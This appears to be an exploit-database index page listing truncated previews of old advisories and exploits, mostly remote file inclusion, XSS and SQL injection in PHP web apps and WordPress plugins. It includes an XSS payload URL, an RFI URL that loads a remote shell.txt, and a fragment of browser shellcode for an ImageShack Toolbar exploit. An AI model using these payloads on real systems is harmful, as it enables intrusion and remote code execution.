Path Traversal in thecodingmachine/mouf

✍️ Description Mouf is vulnerable to path traversal attacks on mouf/mouf/src/direct/getsourcefile.php because it doesnt sanitize user supplied parameters as shown below. Vulnerable variable: file Method: GET The $file variable is constructed using the user supplied data, and then a file is open...

WordPress Strong Testimonials 2.31.4 Cross Site Scripting Vulnerability

Exploit for php platform in category web applications Advisory Title: WordPress Strong Testimonials Plugin Multiple XSS Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Strong Testimonials plugin Language: PHP Version: 2.31.4 and below Vendor Status:...

WordPress Gwolle Guestbook 2.5.3 Cross Site Scripting Vulnerability

Exploit for php platform in category web applications Advisory Title: WordPress Gwolle Guestbook Plugin XSS Security Vulnerability Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Gwolle Guestbook plugin Language: PHP Version: 2.5.3 and below Vendor Status: Vendor...

Simple Slideshow Manager <= 2.3 – Multiple Vulnerabilities

The Simple Slideshow Manager WordPress plugin was affected by security vulnerability. 3.1 Cross-Site Scripting Vulnerable Function: echo Vulnerable Variable: $GET'name' Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="alert42 3.2 Cross-Site...

Zarafe.net CMS 1.0 SQL Injection

Exploit Title : Zarafe.net CMS SQL Injection Vulnerability Exploit Author : Iran Cyber Security Group ICSG Discovered By : 0x3a Vendor HomePage : www.zarrafe.net Version : 1.0 Q1 Date : 4 April, 2016 Tested On : Internet Explorer , Win 98 ----------------------------------------- SQL Injection :...

DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities

No description provided by source. DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities Vulnerability Type: Remote File Inclusion Vulnerable file: /dfdcart/app.lib/product.control/core.php/product.control.config.php Exploit URL:...

ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit

No description provided by source. !-- Title: ImageShack Toolbar 4.8.3.75 Remote Code Execution Exploit Date: Nov 23, 2010 Author: Rew Email: rew splat leethax.info Link: http://toolbar.imageshack.us/ImageShackToolbar.exe Version: 4.8.3.75 Tested on: WinXP - IE 6 & 7 CVE: NA 0day Note: This objec...

nuseo php enterprise 1.6 - Remote File Inclusion Vulnerability

No description provided by source. Vulnerability Type: Remote File Inclusion Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseoadmind.php Exploit URL:...

BIGACE 2.4 - Multiple Remote File Inclusion Vulnerabilities

No description provided by source. / \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ | |--------------------/--|-voV---|'/--Vov-|-----------------------|-| |-| '^ o o '^ | | | | \Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| ||| | @ l /\ / \ /\ l |-| l / V \ \ V \ l @ l/ \I \ /'...

ImageShack Toolbar 4.8.3.75 - Remote Code Execution

// calc.exe var shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua3...

BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications ========================================================= BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities ========================================================= / \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ |...

bigace-rfi.txt

/ \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ | |--------------------/--|-voV---|'/--Vov-|-----------------------|-| |-| '^ o o '^ | | | | \Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| ||| | @ l /\ / \ /\ l |-| l / V \ \ V \ l @ l/ \I \ /' ---------------------------------------------- GrEeTs...

meBiblio 0.4.5 - &#039;action&#039; Remote File Inclusion

meBiblio 0.4.5 RFI --------------------- Author : ShAy6oOoN --------------------- Group : PitBull Crew --------------------- Script : meBiblio 0.4.5 --------------------- Download : http://downloads.sourceforge.net/mebiblio/meBiblio-0.4.5.tar.gz?modtime=1195237984&bigmirror=0 --------------------...

phpfaber-rfi.txt

/ \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ | |--------------------/--|-voV---|'/--Vov-|-----------------------|-| |-| '^ o o '^ | | | | \Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| ||| | @ l /\ / \ /\ l |-| l / V \ \ V \ l @ l/ \I \ /' ---------------------------------------------- GrEeTs...

phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================== phpFaber URLInn 2.0.5 dirws Remote File Inclusion Vulnerability ================================================================== / \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ |...

phpFaber URLInn 2.0.5 - dir_ws Remote File Inclusion

phpFaber URLInn 2.0.5 - dirws Remote File Inclusion / \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ | |--------------------/--|-voV---|'/--Vov-|-----------------------|-| |-| '^ o o '^ | | | | \Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| ||| | @ l /\ / \ /\ l |-| l / V \ \ V \ l @ l/ \I \ /'...

PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion

PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion ---------------------------------------------- GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To ---------------------------------------------- A2J, Chucks, The Pitbull, ICQBomber, str0ke ---------------------------------------------- BiG sHoUt OuT tO...

PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion

---------------------------------------------- GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To ---------------------------------------------- A2J, Chucks, The Pitbull, ICQBomber, str0ke ---------------------------------------------- BiG sHoUt OuT tO udplink.net & ascnet.biz :...

phpnukeplat-rfi.txt

---------------------------------------------- GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To ---------------------------------------------- A2J, Chucks, The Pitbull, ICQBomber, str0ke ---------------------------------------------- BiG sHoUt OuT tO udplink.net & ascnet.biz :...

socketmail-rfi.txt

Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT Line number: 399 Lines:...